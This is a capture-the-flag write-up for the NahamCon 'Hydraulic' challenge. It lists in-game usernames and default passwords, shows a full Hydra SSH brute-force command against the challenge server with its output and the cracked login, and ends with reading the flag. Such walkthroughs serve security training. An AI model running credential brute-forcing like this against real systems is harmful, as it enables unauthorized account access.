<< back

Hydraulic

Challenge Text

Author: @JohnHammond#6971

This is Stage 2 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.

Gain access with the information you have gathered thus far and retrieve the flag.

You may bruteforce this challenge... hence the name ;)

Press the Start button on the top-right to begin this challenge.

Solution

• Once finding new website directory structure via Lyra’s Twitter page and poking around a bit, we find http://constellations.page/constellations-documents/5/ with lists of user names and default passwords:

CONSTELLATIONS Default Account Passwords
INTERNAL: this should not be shared outside of the org
Personnel Names

User accounts following the naming convention of lowercase firstname.

    orion
    pavo
    gus
    vela
    hercules
    leo
    lyra
    gemini 

Default Passwords

    starstar
    allstars
    starstruck
    starshine
    starsky
    popstars
    starship
    bluestars
    pinkstars
    superstars
    ilovestars
    rockstars
    thestars
    starscream
    gostars
    shootingstars
    northstars
    alpinestars
    starsign
    moonandstars
    starsrock
    luckystars
    iluvstars
    fivestars
    redstars
    mystars
    lovestars
    dallasstars
    moonstars
    sunmoonstars
    starsailor
    silverstars
    sevenstars
    lilstars
    dotaallstars
    sunstars
    starsun
    starsstars
    starsareblind
    pokerstars
    magicstars
    divastars
    blackstars
    starstarstar
    starsearch
    luvstars
    greenstars
    deathstars
    brightstars
    twinstars
    starsinthesky
    starshooter
    starsha
    threestars
    summerstars
    starspirit
    starshollow
    starsandstripes
    starsandmoons
    nightstars
    metrostars
    icstars
    hoodstars
    deadstars
    citystars

• We can copy/paste these lists into separate files, then feed them into Hydra:

$ hydra -s 32369 -L users -P ./passwords challenge.nahamcon.com -t 4 ssh 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 11:13:25
[DATA] max 4 tasks per 1 server, overall 4 tasks, 520 login tries (l:8/p:65), ~130 tries per task
[DATA] attacking ssh://challenge.nahamcon.com:32369/
[STATUS] 36.00 tries/min, 36 tries in 00:01h, 484 to do in 00:14h, 4 active
[STATUS] 29.67 tries/min, 89 tries in 00:03h, 431 to do in 00:15h, 4 active
[32369][ssh] host: challenge.nahamcon.com   login: pavo   password: starsinthesky                                                                     
[STATUS] 31.00 tries/min, 217 tries in 00:07h, 303 to do in 00:10h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 11:21:48

• After this, it’s just a matter of loading the instance, logging in with these credentials via SSH and grabbing the flag in the user’s home directory.